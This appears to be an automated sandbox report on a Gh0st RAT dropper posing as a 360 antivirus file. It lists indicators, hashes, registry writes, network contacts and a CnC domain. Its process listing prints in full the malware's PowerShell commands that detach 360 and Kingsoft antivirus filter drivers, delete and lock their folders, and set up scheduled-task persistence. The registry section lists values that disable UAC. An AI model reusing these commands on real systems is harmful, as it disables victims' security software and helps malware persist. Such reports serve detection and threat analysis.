File name:

5.exe

Full analysis: https://app.any.run/tasks/1afe23f0-4890-494d-afa6-322db614d536
Verdict: Malicious activity
Threats:

Gh0st RAT is a malware with advanced trojan functionality that enables attackers to establish full control over the victim’s system. The spying capabilities of Gh0st RAT made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common vector of attack involving this malware begins with spam and phishing emails.

Malware Trends Tracker     >>>
Analysis date: December 19, 2024, 08:29:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
rat
gh0st
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

0CCA6CAD8F404568494C4D12A6CB5C53

SHA1:

E7D5D468FE2DA6D32419A4D4AE5CB888B075A8CD

SHA256:

F62193FAAD9F9B8B3B81B904AAC6E5E9AB2B07EA19287A3C07DB898CCF123C41

SSDEEP:

98304:ODrpK4L00MTSMVr0Xb002l0M2s6jRzvy7KV3rt8nOBl6M8Q/kh5ANftsXJnJnu34:4o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 5.exe (PID: 6560)
      • 5.exe (PID: 6392)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)

    • Changes powershell execution policy (Bypass)

      • iusb3mon.exe (PID: 6712)

    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 6712)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 1020)

    • Connects to the CnC server

      • iusb3mon.exe (PID: 6712)

    • GH0ST has been detected (SURICATA)

      • iusb3mon.exe (PID: 6712)

  • SUSPICIOUS

    • Reads the Windows owner or organization settings

      • irsetup.exe (PID: 6608)

    • Reads security settings of Internet Explorer

      • irsetup.exe (PID: 6608)
      • ShellExperienceHost.exe (PID: 5032)

    • Executable content was dropped or overwritten

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)

    • Reads the date of Windows installation

      • irsetup.exe (PID: 6608)

    • Renames file via Powershell

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 3992)

    • Removes files via Powershell

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 6860)
      • powershell.exe (PID: 6884)
      • powershell.exe (PID: 6868)
      • powershell.exe (PID: 6912)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 3992)

    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 3992)

    • Manipulates environment variables

      • powershell.exe (PID: 6860)
      • powershell.exe (PID: 6884)
      • powershell.exe (PID: 6912)
      • powershell.exe (PID: 6868)

    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 6712)

    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 6712)

    • Starts POWERSHELL.EXE for commands execution

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)

    • Creates file in the systems drive root

      • cmd.exe (PID: 7036)
      • iusb3mon.exe (PID: 6712)

    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 6712)

    • Suspicious use of asymmetric encryption in PowerShell

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6912)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6912)

    • Connects to unusual port

      • iusb3mon.exe (PID: 6712)

    • Probably obfuscated PowerShell command line is found

      • irsetup.exe (PID: 6608)

    • Contacting a server suspected of hosting an CnC

      • iusb3mon.exe (PID: 6712)

  • INFO

    • Checks supported languages

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)
      • iusb3mon.exe (PID: 6712)
      • ShellExperienceHost.exe (PID: 5032)

    • The sample compiled with chinese language support

      • 5.exe (PID: 6560)

    • The sample compiled with english language support

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)

    • Create files in a temporary directory

      • 5.exe (PID: 6560)
      • SecEdit.exe (PID: 7680)

    • Process checks computer location settings

      • irsetup.exe (PID: 6608)

    • Reads the computer name

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)

    • Reads the machine GUID from the registry

      • iusb3mon.exe (PID: 6712)

    • Sends debugging messages

      • iusb3mon.exe (PID: 6712)

    • Creates files in the program directory

      • iusb3mon.exe (PID: 6712)

    • The process uses the downloaded file

      • irsetup.exe (PID: 6608)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 3992)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.scr | Windows screen saver (76.6)
.exe | Generic Win/DOS Executable (11.7)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 152064
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 5.0.0.5096
ProductVersionNumber: 5.0.0.5096
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Chinese (Simplified)
CharacterSet: Unicode
CompanyName: 360.cn
FileDescription: 360杀毒 文件堡垒
FileVersion: 5, 0, 0, 5096
InternalName: 360FileGuard.exe
LegalCopyright: (C)360.cn All Rights Reserved.
OriginalFileName: 360FileGuard.exe
ProductName: 360杀毒
ProductVersion: 5, 0, 0, 5096
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
178
Monitored processes
46
Malicious processes
9
Suspicious processes
7

Behavior graph

Click at the process to see the details
start 5.exe irsetup.exe #GH0ST iusb3mon.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs shellexperiencehost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs conhost.exe no specs secedit.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs secedit.exe no specs secedit.exe no specs secedit.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs 5.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1020cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xmlC:\Windows\SysWOW64\cmd.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2624"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeirsetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3780powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3992"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeirsetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
4388\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4952\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5032"C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mcaC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shell Experience Host
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\wincorlib.dll
5556\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6352\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6368schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xmlC:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
63 855
Read events
63 842
Write events
9
Delete events
4

Modification events

(PID) Process:(6712) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(6712) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(6712) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(5032) ShellExperienceHost.exeKey:\REGISTRY\A\{328c6e10-6c41-255e-04f1-a01067554b7d}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D0000005BAE6831F051DB01
(PID) Process:(5032) ShellExperienceHost.exeKey:\REGISTRY\A\{328c6e10-6c41-255e-04f1-a01067554b7d}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D000000239C6D31F051DB01
(PID) Process:(6712) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6712) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6712) iusb3mon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6780) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
(PID) Process:(7632) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
Executable files
3
Suspicious files
10
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
6608irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPGimage
MD5:AC40DED6736E08664F2D86A65C47EF60
SHA256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
65605.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeexecutable
MD5:2A7D5F8D3FB4AB753B226FD88D31453B
SHA256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
7036cmd.exeC:\inst.initext
MD5:81051BCC2CF1BEDF378224B0A93E2877
SHA256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
6712iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPGimage
MD5:E39405E85E09F64CCDE0F59392317DD3
SHA256:CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F
6740powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bw0n1n5m.o2r.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6712iusb3mon.exeC:\Users\admin\AppData\Local\Temp\Xlpd 5 Update Log.txttext
MD5:580C81A07189DBC37C161FA1E25B252F
SHA256:EB4ECEAFBE6BB1F9777A07F309AB2D059942A8283BEF24F416CE7BAE2A6B9167
6608irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.datbinary
MD5:9F712C1DE55D81043196069AFC7078FF
SHA256:65B6CB54F57D16B40988F56D28F9235071BD9E6CA70498C6946539AC80D4C59D
6912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_20sfpa2v.hm3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6712iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG3.JPGbinary
MD5:9CA19B0ABBD0BBF8C01D835AABE36C0E
SHA256:568BA3C29FFB6BC581602235D46210989831B00689F369B965ABBA061A042C02
6712iusb3mon.exeC:\ProgramData\Microsoft\MicrosoftNetFramework.xmlxml
MD5:69C282FDCD177C1AC4D6709EF841DA65
SHA256:943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
61
DNS requests
18
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7104
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7104
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6252
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:137
whitelisted
4160
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2736
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
2.23.209.137:443
www.bing.com
Akamai International B.V.
GB
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
184.28.89.167:443
go.microsoft.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
20.190.160.20:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
  • 40.127.240.158
whitelisted
www.bing.com
  • 2.23.209.137
  • 2.23.209.142
  • 2.23.209.149
  • 2.23.209.144
  • 2.23.209.143
  • 2.23.209.135
  • 2.23.209.140
  • 2.23.209.141
  • 2.23.209.148
whitelisted
google.com
  • 142.250.185.238
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.138
  • 20.190.160.14
  • 40.126.32.72
  • 40.126.32.140
  • 40.126.32.68
  • 40.126.32.134
whitelisted
k2.laomaogege2.com
  • 118.107.32.227
unknown
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
Process
Message
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...